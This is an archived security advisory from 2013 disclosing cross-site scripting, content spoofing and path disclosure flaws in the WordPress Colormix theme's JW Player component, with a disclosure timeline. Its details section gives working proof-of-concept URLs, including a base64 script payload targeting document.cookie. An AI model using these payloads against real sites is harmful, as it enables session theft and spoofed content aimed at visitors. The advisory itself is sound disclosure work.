exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Colormix XSS / Content Spoofing / Path Disclosure

WordPress Colormix XSS / Content Spoofing / Path Disclosure
Posted Apr 21, 2013
Authored by MustLive

WordPress Colormix theme suffers from cross site scripting, path disclosure, and content spoofing vulnerabilities.

tags | exploit, spoof, vulnerability, xss, file inclusion, info disclosure
SHA-256 | 1a6d8b2caf5b79f12115a437ecd623f9858b32df35626257b4cff71c1392af40

WordPress Colormix XSS / Content Spoofing / Path Disclosure

Change Mirror Download
Hello list!

Last year I've disclosed vulnerabilities in JW Player and in RokBox. Which
were fixed by the developers - JW Player developers fixed one hole and
promised to fix others later and RokBox fixed all holes (but it was
questionable how they fixed holes related to JW Player).

In December I've wrote about 47 RocketTheme's themes for WordPress (which
contain RokBox). Besides their themes I've found in December similar
vulnerabilities in multiple themes of other developers (including custom
themes).

Now I'll inform you about multiple vulnerabilities in Colormix theme for
WordPress. These are Cross-Site Scripting, Content Spoofing and Full path
disclosure vulnerabilities.

-------------------------
Affected products:
-------------------------

Affected all versions of Colormix theme for WordPress.

Other themes of this developer can be vulnerable as well.

-------------------------
Affected vendors:
-------------------------

Wordpress Themes Park
http://www.wordpressthemespark.com

----------
Details:
----------

XSS (WASC-08):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Content Spoofing (WASC-12):

In parameter file there can be set as video, as audio files.

Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

1.xml

<config>
<file>1.flv</file>
<image>1.jpg</image>
</config>

Content Spoofing (WASC-12):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

There are FPD In folder http://site/wp-content/themes/colormix/ in index.php
and many other php-files of theme.

------------
Timeline:
------------

2012.05.29 - informed developers of JW Player.
2012.08.18 - informed developers about new holes in JW Player Pro.
2012.08.28 - informed developers of Rokbox.
2012.12.14 - disclosed at my site about Rokbox.
2012.12.23 - disclosed to the lists the first part of vulnerable themes by
RocketTheme for WordPress.
2012.12.30 - disclosed to the lists the second part of vulnerable themes by
RocketTheme for WordPress.
2013.04.18 - disclosed at my site about Colormix theme
(http://websecurity.com.ua/6457/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close